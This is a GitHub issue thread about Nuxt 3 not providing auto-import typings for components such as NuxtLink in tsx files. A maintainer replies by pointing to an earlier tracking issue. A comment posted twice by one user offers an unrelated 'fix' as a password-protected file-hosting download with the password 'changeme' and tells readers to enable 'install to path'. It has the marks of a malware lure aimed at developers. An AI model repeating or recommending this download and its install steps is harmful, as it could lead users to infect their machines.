### ISSUE TITLE
(tsx) Auto imports typings

### ISSUE THREAD

**Issue by ElYaiko** [nuxt/nuxt#28781]
### Environment

------------------------------
- Operating System: Linux
- Node Version:     v20.15.1
- Nuxt Version:     3.13.0
- CLI Version:      3.13.1
- Nitro Version:    2.9.7
- Package Manager:  bun@1.1.27
- Builder:          -
- User Config:      compatibilityDate, devtools
- Runtime Modules:  -
- Build Modules:    -
------------------------------

### Reproduction

https://stackblitz.com/edit/github-hxerk6?file=app.tsx

### Describe the bug

Components types are not being auto imported when working with `tsx` files instead `vue`. (But they render ok)
For example I get: `Cannot find name 'NuxtLink'.`
But if I import the `NuxtLink` from `#components` manually I get the typings.

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by danielroe** [comment]
let's track in https://github.com/nuxt/nuxt/issues/26920 - see https://github.com/nuxt/nuxt/issues/26920#issuecomment-2170586733 for an explanation of why this is the case.
